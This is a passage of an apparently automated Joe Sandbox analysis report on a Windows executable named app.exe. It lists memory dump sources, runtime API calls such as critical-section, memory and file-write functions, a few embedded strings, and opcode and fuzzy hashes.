                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memmove$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3790616698-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A801AD03), ref: 00007FF8A801C2B5
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A801AD03), ref: 00007FF8A801C2D9
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A801AD03), ref: 00007FF8A801C2E1
                                                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A801AD03), ref: 00007FF8A801C329
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$Leave$Entermemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2581898777-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A801B138), ref: 00007FF8A801E5C1
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A801B138), ref: 00007FF8A801E626
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A801B138), ref: 00007FF8A801E673
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF8A801B138), ref: 00007FF8A801E69C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$Leave$Entermalloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3130977980-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: exit
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2483651598-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: exit$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2031340617-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7ACE9C34B), ref: 00007FF7ACE9C47C
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7ACE9C34B), ref: 00007FF7ACE9C507
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$Leave$ConditionEnterVariableWake
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3011652882-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$exit
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2160831268-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$ConditionEnterLeaveSleepVariablememmove
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 344065560-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize$ConditionCriticalSectionVariablecallocmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3763664433-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2988086103-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Dealloc$Buffer_FreeMem_Release
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2882253451-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Dealloc$Buffer_Release
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2626048392-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8A8131112
                                                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8A8131122
                                                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8A8131132
                                                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8A813113F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$DeleteEnterLeavefreemallocmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 654641933-0
                                                                                                                                                                                                            • Opcode ID: 3088a103aa531b3f44fa8809426126977969d6e41be397239cee5e96a13218fe
                                                                                                                                                                                                            • Instruction ID: f0daad31f1c847f6752e4bec822a6c42710ab88d00eb43d73a0a26957738214b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3088a103aa531b3f44fa8809426126977969d6e41be397239cee5e96a13218fe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0028122E09B85D7EB188B35D6503B9B3A0FB69798F049225DB9D13A91DF38F1F48314
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACE97DCE
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: HeapFree.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D5E
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: GetLastError.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D68
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7ACE8ADA5), ref: 00007FF7ACE97DEC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                            • API String ID: 3580290477-886552919
                                                                                                                                                                                                            • Opcode ID: 78bb50e8dbf74795731634f2bf23dc57cb2593a68118be5c005d29b839edbd54
                                                                                                                                                                                                            • Instruction ID: 7eda0af5dec47f78a8ca63ba6b7b682e21da23ab6636037a79b392ebdaa162c7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78bb50e8dbf74795731634f2bf23dc57cb2593a68118be5c005d29b839edbd54
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB419F32A0EB02E5EB15EF2598810BDE394EF457C4B964035F90E67BA5DF3CE8958360
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                            • Opcode ID: 25d3c82af5dee18dec41a6839be42a4efbc899a14913ea0c1072e724c64aea02
                                                                                                                                                                                                            • Instruction ID: 1f30f3a123a72f4e4e8273897a9b2be7270bb1773d402cb61e426f06f3f887d1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25d3c82af5dee18dec41a6839be42a4efbc899a14913ea0c1072e724c64aea02
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C641A232B1DA81A5DB20AF25E4443AAE661FB88784F954031EA4D977A8DF3CD441C750
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285221052.00007FF8A7E71000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF8A7E70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285204631.00007FF8A7E70000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285237784.00007FF8A7E73000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285254997.00007FF8A7E74000.00000004.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285271778.00007FF8A7E75000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7e70000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _wassert
                                                                                                                                                                                                            • String ID: (idx>=1) && (idx<=10)$src/AESNI.c
                                                                                                                                                                                                            • API String ID: 3234217646-2495715787
                                                                                                                                                                                                            • Opcode ID: 08d31a947a560325b6089d36716e23ca456f5369de0bb12b09cf002d6475e52f
                                                                                                                                                                                                            • Instruction ID: 8f2f8cb65bca961cd44cc481157ebf5bc77786602ed78e080da2f10af6dc26bb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08d31a947a560325b6089d36716e23ca456f5369de0bb12b09cf002d6475e52f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39210673D0E3C25AD7138F31A45016C3FB0EB96F80F898176C38843A82EA5CE8A5D701
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                            • Opcode ID: 4e53f776409002b20d4ddb835971d11a9637ed93fbd7b6ab35eb1d8227726c82
                                                                                                                                                                                                            • Instruction ID: 94ee1a951dfb319d97a8f1713dc2ececa86697bb39d86a66af79666253addb84
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e53f776409002b20d4ddb835971d11a9637ed93fbd7b6ab35eb1d8227726c82
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7021D272A0D28192EB34AB15D04427DF3B1FB84B84FC68035E79D672A4DF7CE9458761
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Fatal error detected
                                                                                                                                                                                                            • API String ID: 1878133881-4025702859
                                                                                                                                                                                                            • Opcode ID: d8350b2dd45537fcb102945a95e56e5fec4cbfd54fbf68520de5e8d25681b826
                                                                                                                                                                                                            • Instruction ID: 9c3d92e197dfcc454b9a4380e5654ee6baf8d9b745810a057d7d445cf113829a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8350b2dd45537fcb102945a95e56e5fec4cbfd54fbf68520de5e8d25681b826
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7721C77272D781A1EB20A750F4507EAB364FB84789FC14035E68D676A5DF3CD205CB60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Error detected
                                                                                                                                                                                                            • API String ID: 1878133881-3513342764
                                                                                                                                                                                                            • Opcode ID: 06108ee8a0dfea952a12a3b0306062f889501f0bb9d520917d4d6b2389df326d
                                                                                                                                                                                                            • Instruction ID: 12d15899d12f0a8a7e3900465ef0c1572254326ffc9584af98d6fe2b4252f6e4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06108ee8a0dfea952a12a3b0306062f889501f0bb9d520917d4d6b2389df326d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C221B27272D782A1EB20A750F4503EAB364FB84789FC15035EA8D676A9DF3CD205CB60
Memory Dump Source
• Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 858846fea34555fb8d2c4f12b26bdb04a58b0d9f624c4d397e9619eb30fde2ff
• Instruction ID: 8d85c9f7d9476b0639170df2c23d7d35ce3eb7369c336d506b5bdbc8223d4428
• Opcode Fuzzy Hash: 858846fea34555fb8d2c4f12b26bdb04a58b0d9f624c4d397e9619eb30fde2ff
• Instruction Fuzzy Hash: 97118C3660DB8192EB219F15E500269B7A0FB88B85F9D4270EE8C17768DF3CC5618B10
Memory Dump Source
• Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
• Opcode ID: 4110ab54a1292af6c610fc14bebcfde478b3b42ba13f09fd81a5f0b3dffa68e3
• Instruction ID: 4d71671faf30ffc65a265887edb7199b2c699ed85b22a12e0cc2efba0b7b364c
• Opcode Fuzzy Hash: 4110ab54a1292af6c610fc14bebcfde478b3b42ba13f09fd81a5f0b3dffa68e3
• Instruction Fuzzy Hash: 1601843191E642A6F730BF60946227EE390EF44744FC60536E65E676A5DF3CE504CA24
Memory Dump Source
• Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
• Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
Similarity
• API ID: AttrObject_String
• String ID: close$close
• API String ID: 4108415579-1493118870
• Opcode ID: 212c211b7a44556a8a3806320755016be30287762e5d8e91c8d41298e6e1194c
• Instruction ID: 1006ed85b4cbcc9b26ecaabcff3fddf85b8d49aa3a99ba44eb1ce631895ea16b
• Opcode Fuzzy Hash: 212c211b7a44556a8a3806320755016be30287762e5d8e91c8d41298e6e1194c
• Instruction Fuzzy Hash: 30F06252E0BA46A0FF548F29D49473823A0EB54BC8F480031C94D462A0CFBDD5EAE354
Memory Dump Source
• Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
• Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
